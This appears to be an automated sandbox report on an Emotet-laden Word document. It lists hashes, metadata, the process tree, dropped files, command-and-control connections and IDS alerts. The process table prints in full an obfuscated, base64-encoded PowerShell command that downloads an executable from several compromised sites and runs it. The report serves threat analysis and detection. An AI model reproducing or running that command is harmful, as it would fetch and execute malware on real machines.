download: | 2019-04 |
Full analysis: | https://app.any.run/tasks/a859164b-d54c-4680-852b-b02b33cb8aa3 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | April 23, 2019, 10:48:23 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Apr 23 07:36:00 2019, Last Saved Time/Date: Tue Apr 23 07:36:00 2019, Number of Pages: 1, Number of Words: 2, Number of Characters: 12, Security: 0 |
MD5: | F97A9C507B3161379696F978D59E5A77 |
SHA1: | 4C5E0D55BDC60527FC98BEE188634FF7DD9AA700 |
SHA256: | 349808AE5CDB176953E1CDAD90F95C82FFF460A2D1C7F381FD03B9FA7EE01275 |
SSDEEP: | 3072:i4eOY5CTsdApN2mF/qn6wq0dFiynHFCAGh10ow7n0Z44Zcg53Z:iTbiVqn6hwTl320ow70Z44z3Z |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:04:23 06:36:00 |
ModifyDate: | 2019:04:23 06:36:00 |
Pages: | 1 |
Words: | 2 |
Characters: | 12 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 13 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2836 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2019-04.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2596 | powershell -e JABjAEEAQQBRAEMARwBrAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBjACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBBAF8AQQAnACwAJwB1AEEAQgAnACkALAAnAG8AJwApACkAOwAkAGMAQQBBAEEAYwBfACAAPQAgACcANwA2ADkAJwA7ACQAegBCAEIAQQBBAEIAPQAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEMAJwAsACcAYwBEAEEAJwApACwAJwBHAEEAMQAnACwAJwBiACcAKQA7ACQAVgBjAEEAXwBaAFEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGMAQQBBAEEAYwBfACsAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwAuAGUAeAAnACwAJwBlACcAKQA7ACQAUQBRAG8AQQBRADQAUQBvAD0AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBBAEQAQQAnACwAJwBYAFEAawAnACkAOwAkAEsAVQBBAFEAQgBRAEEAawA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAAbgBFAGAAVABgAC4AVwBFAGAAQgBgAGMATABpAGUATgB0ADsAJABRAEEARwBEAEIAQgA9ACgAIgB7ADcAfQB7ADMAMAB9AHsAOAB9AHsAMgB9AHsAMQA0AH0AewAyADEAfQB7ADQAfQB7ADIAOQB9AHsAMQA2AH0AewAxADkAfQB7ADIANwB9AHsAMgA0AH0AewAyADIAfQB7ADIAMAB9AHsAMgAzAH0AewAwAH0AewA2AH0AewAyADgAfQB7ADIANQB9AHsAMQB9AHsAOQB9AHsAMQA1AH0AewAxADIAfQB7ADEAOAB9AHsAMQAxAH0AewAxADAAfQB7ADEANwB9AHsAMgA2AH0AewAzAH0AewAxADMAfQB7ADUAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAaQBlACcALAAnAGEAdAAnACkALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHgAbwBmACcALAAnAHIAJwApACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACcALwB3AHAAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbwBtACcALAAnAC4AYwAnACkALAAnAGkAbgAnACkALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAG4AJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAbwBuACcALAAnAHQAZQAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcALQBhAGQAJwAsACcAbQAnACkALAAnAGkAbgAnACkALAAnAFYALwAnACwAJwBuAHQALgAnACwAJwBoAHQAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAbgAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAeQBkACcALAAnAGEAYQAnACkAKQAsACcAZAAvACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwAuACcALAAnAGcAcgBvACcAKQAsACcAdwAnACwAJwBoACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHQALwBZACcALAAnADYAJwApACwAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAC0AYQBkACcALAAnAG0AaQAnACkALAAnAC8AbQAnACwAJwBuACcAKQAsACgAIgB7ADMAfQB7ADEAfQB7ADIAfQB7ADAAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAJwB3AHcAdwAnACwAJwAvAC8AJwAsACcALgB0ACcAKQAsACcAOAAwAC8AJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHQAdABwAHMAOgAnACwAJwBAAGgAJwApACwAJwA4ACcAKQAsACcAegAvACcALAAnAHUAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAYgBlAHIAbQAnACwAJwBlACcAKQAsACcAYQAnACwAJwBhAG4AbAAnACkALAAoACIAewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAgACcAcAA6ACcALAAnAEAAaAAnACwAJwB0AHQAJwApACwAKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwB0ACcALAAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAC8AaAAnACwAJwBwADoALwAnACwAJwBhACcAKQAsACcAdAAnACkALAAoACIAewA2AH0AewAwAH0AewA0AH0AewA1AH0AewAyAH0AewAzAH0AewAxAH0AIgAtAGYAIAAnAHAAJwAsACcALwB3AHAAJwAsACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACcAbgAnACwAJwBvAHYAJwAsACcAYQAnACwAJwBrAGkAdABvAHMAJwApACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcALgBjACcALAAnAG8AbQAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwA6AC8ALwAnACwAJwBhACcAKQAsACcAbABvACcALAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAgACcAQABoACcALAAnAHQAdAAnACwAJwAyADcAcABxAC8AJwApACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBoAC8AJwAsACcAYQBVACcAKQAsACcAQABoACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACcAYgBlACcALAAnAHkAdABvACcALAAnAHAAJwApACwAJwBwAHAAJwApACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAGkAbgAvAGMAJwAsACcALQBiACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAG0ALwBjACcALAAnAGcAaQAnACkALAAnAG8AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAOAAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAG0ALwBvACcALAAnAG8AJwApACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAcAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBjACcALAAnAC8AdwBwAC0AJwApACkALAAoACIAewAwAH0AewAxAH0AewA0AH0AewAzAH0AewAyAH0AIgAgAC0AZgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAC8ALwAnACwAJwA5ADEAJwApACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBhAHAAaAAnACwAJwAyAGcAcgAnACkALAAnAGMAJwAsACcAYwBzAC4AJwAsACcAaQAnACkALAAnAGMAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbABDACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnADcAJwAsACcALwBSADEAJwApACkALAAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAIAAnAHQAcAA6ACcALAAnAGEAcgBlACcALAAnAC8ALwAnACkAKQAuACIAcwBgAHAATABJAHQAIgAoACcAQAAnACkAOwAkAFoAQQBBAFUARABBAEQAQQA9ACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBfACcALAAnAHMAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAEEAJwAsACcAVQBBAEEAJwApACwAJwB4AG8AJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABmAFUAQQBVAG8AYwBjAEcAIABpAG4AIAAkAFEAQQBHAEQAQgBCACkAewB0AHIAeQB7ACQASwBVAEEAUQBCAFEAQQBrAC4AIgBEAG8AVwBOAGAAbABvAGAAQQBkAEYASQBgAEwARQAiACgAJABmAFUAQQBVAG8AYwBjAEcALAAgACQAVgBjAEEAXwBaAFEAKQA7ACQAUQBDAFUAUQBrAHcAQgA9ACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAdwA0ACcALAAnAEEAXwAnACkALAAnAEEAJwApACwAJwBiAFEAJwAsACcAQgAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAVgBjAEEAXwBaAFEAKQAuACIATABlAG4ARwBgAFQASAAiACAALQBnAGUAIAAzADgANwAzADUAKQAgAHsALgAoACcASQBuAHYAJwArACcAbwBrAGUAJwArACcALQBJAHQAJwArACcAZQBtACcAKQAgACQAVgBjAEEAXwBaAFEAOwAkAEUAQQBBAEIAeAB4AEEAPQAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBBAEIAJwAsACcAVQB4AEQAJwApACwAJwBpACcAKQAsACcAbwAnACwAJwBRACcAKQA7AGIAcgBlAGEAawA7ACQARwBVAFgAWgBBAEEAPQAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAgACcATwAnACwAJwBaAFEAQQAnACwAJwBBAEEARwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGEAQQBBAGsAWABVAD0AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBvAEcAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAQQBRACcALAAnAEQAQQAnACkAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3424 | "C:\Users\admin\769.exe" | C:\Users\admin\769.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2508 | --6cf013b8 | C:\Users\admin\769.exe | 769.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3632 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 769.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2496 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3336 | "C:\Users\admin\AppData\Local\soundser\3Ewo0jLrdD.exe" | C:\Users\admin\AppData\Local\soundser\3Ewo0jLrdD.exe | — | soundser.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3784 | --f406a7f1 | C:\Users\admin\AppData\Local\soundser\3Ewo0jLrdD.exe | 3Ewo0jLrdD.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3092 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 3Ewo0jLrdD.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3480 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2836 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRFA46.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2596 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EG7QVB9HPWLKCX0A19AB.temp | — | |
MD5:— | SHA256:— | |||
2596 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:5F9A7BF5388376D94C2EDCA422810BEC | SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C | |||
2596 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1303bc.TMP | binary | |
MD5:5F9A7BF5388376D94C2EDCA422810BEC | SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C | |||
3784 | 3Ewo0jLrdD.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:344661383E3FA6883CC8244E707E6922 | SHA256:45F26498254683D8B98F31538FDDFC4ADBBCF83BD80A787780237A5F3887BBDD | |||
2836 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:B39B54834F29A0EED7330CA9E34A9AE2 | SHA256:59F521C8BE8E2FCB3D7C09340383539CAFA80B77A23C147812925554CD1FDA23 | |||
2836 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:4308447AEB47FAFBD179F10F3BB92936 | SHA256:15B4C7785169A5EE970977CCB39DD7A87487CCEEF2D69540B530928CF28874B9 | |||
2508 | 769.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:917FFA7297CA29545219EB3B821684CD | SHA256:760CCB0EDEEEAFE0CAE52334884C431CCD8A753B070CD4F6CB3D2DC2ACAC2404 | |||
2596 | powershell.exe | C:\Users\admin\769.exe | executable | |
MD5:917FFA7297CA29545219EB3B821684CD | SHA256:760CCB0EDEEEAFE0CAE52334884C431CCD8A753B070CD4F6CB3D2DC2ACAC2404 | |||
2836 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$019-04.doc | pgc | |
MD5:C1DECF3496C8F6E4C893BAC6346457C6 | SHA256:9B4B8EC0C22F035D3F7255BE3A74EBE67FCC0352DB537260405BC91D3DF420D8 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2496 | soundser.exe | POST | — | 152.168.82.167:80 | http://152.168.82.167/enabled/badge/ringin/merge/ | AR | — | — | malicious |
2496 | soundser.exe | POST | — | 197.91.152.93:80 | http://197.91.152.93/cab/scripts/ringin/merge/ | ZA | — | — | malicious |
2596 | powershell.exe | GET | 200 | 31.169.92.34:80 | http://arenaaydin.com/wp-admin/m27pq/ | TR | executable | 77.5 Kb | malicious |
2496 | soundser.exe | POST | — | 77.82.85.35:8080 | http://77.82.85.35:8080/publish/cone/ringin/ | RU | — | — | malicious |
2496 | soundser.exe | POST | 200 | 66.228.45.129:8080 | http://66.228.45.129:8080/bml/add/ringin/merge/ | US | binary | 85.8 Kb | malicious |
3480 | soundser.exe | POST | — | 152.168.82.167:80 | http://152.168.82.167/child/prov/ringin/ | AR | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2496 | soundser.exe | 197.91.152.93:80 | — | OPTINET | ZA | malicious |
2596 | powershell.exe | 31.169.92.34:80 | arenaaydin.com | Netfactor Telekominikasyon Ve Teknoloji Hizmetleri Sanayi Ve Jsc | TR | malicious |
2496 | soundser.exe | 152.168.82.167:80 | — | CABLEVISION S.A. | AR | malicious |
2496 | soundser.exe | 77.82.85.35:8080 | — | PJSC Rostelecom | RU | malicious |
3480 | soundser.exe | 152.168.82.167:80 | — | CABLEVISION S.A. | AR | malicious |
2496 | soundser.exe | 66.228.45.129:8080 | — | Linode, LLC | US | malicious |
Domain | IP | Reputation |
---|---|---|
arenaaydin.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2596 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2596 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2596 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2496 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 3 |
2496 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2496 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 14 |
2496 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2496 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 22 |
2496 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2496 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 21 |